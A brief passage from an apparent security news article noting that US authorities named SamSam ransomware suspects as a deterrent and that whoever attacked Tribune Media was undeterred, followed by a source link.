With SamSam, the US Government pursued the attackers quietly before apparently deciding to use the naming of suspects as a deterrent against future attacks.

Whomever was behind the attack on Tribune Media was obviously undeterred.

Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/sSmNiY58cz0/